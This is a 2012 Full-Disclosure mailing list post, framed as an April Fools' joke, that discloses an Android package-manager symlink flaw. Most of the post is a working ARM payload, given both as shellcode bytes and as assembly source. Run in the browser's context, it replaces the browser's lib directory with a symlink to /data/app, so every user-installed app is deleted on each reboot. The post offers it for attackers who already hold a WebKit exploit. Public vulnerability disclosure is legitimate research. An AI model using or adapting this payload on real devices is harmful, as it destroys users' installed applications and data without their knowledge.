Date: Sun, 01 Apr 2012 13:39:49 -0400
From: Dan Rosenberg <dan.j.rosenberg@...il.com>
To: full-disclosure <full-disclosure@...ts.grok.org.uk>
Subject: An April Fools' Day Android Payload

/*
 * Android Arbitrary File Removal Payload
 * by Dan Rosenberg (@djrbliss)
 *
 * Android differentiates between "system" applications and user-installed
 * applications, where the former are OEM-shipped and installed in /system/app
 * rather than /data/app (this has nothing to do with the privileges with which
 * these applications run).  On boot, the Android package manager does a sanity
 * check on system apps to ensure their native library directories, in
 * /data/data/[app]/lib, are empty, and if not, empties them by unlinking
 * everything inside.  This check will happily follow symbolic links, so if you
 * can run code in the context of a system application (such as the browser),
 * you can replace its lib/ directory with a symlink to a target directory,
 * which will be (non-recursively) emptied on every subsequent reboot until the
 * symlink is removed.  Of course this will only remove files on filesystems
 * mounted read-write (usually not /system).
 *
 * I expect this will be useful for APT attackers who have Webkit exploits, are
 * really bored, and want to play pranks on their victims. :p
 *
 * This ARM payload removes all user-installed applications on reboot, freeing
 * you from the shackles of your Twitter addiction.  This example must be run
 * in the context of the Android browser.
 *
 *   char payload[] = "\x04\xa0\x28\x27\x00\xdf\x0c\xa0\x02\xa1\x53\x27\x00"
 *                    "\xdf\x01\x27\x00\xdf\xc0\x46\x2f\x64\x61\x74\x61\x2f"
 *                    "\x64\x61\x74\x61\x2f\x63\x6f\x6d\x2e\x61\x6e\x64\x72"
 *                    "\x6f\x69\x64\x2e\x62\x72\x6f\x77\x73\x65\x72\x2f\x6c"
 *                    "\x69\x62\x00\x00\x2f\x64\x61\x74\x61\x2f\x61\x70\x70"
 *                    "\x00\xc0\x46";
 */

.equ    NR_exit,    1
.equ    NR_rmdir,   40
.equ    NR_symlink, 83

.thumb
.text

start:

.Lrmdir:
    adr r0, .Llib
    mov r7, #NR_rmdir
    swi #0

.Lsymlink:
    adr r0, .Lapps
    adr r1, .Llib
    mov r7, #NR_symlink
    swi #0

.Lexit:
    mov r7, #NR_exit
    swi #0

.align
.Llib:
    .asciz "/data/data/com.android.browser/lib"

.align
.Lapps:
    .asciz "/data/app"

.end

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/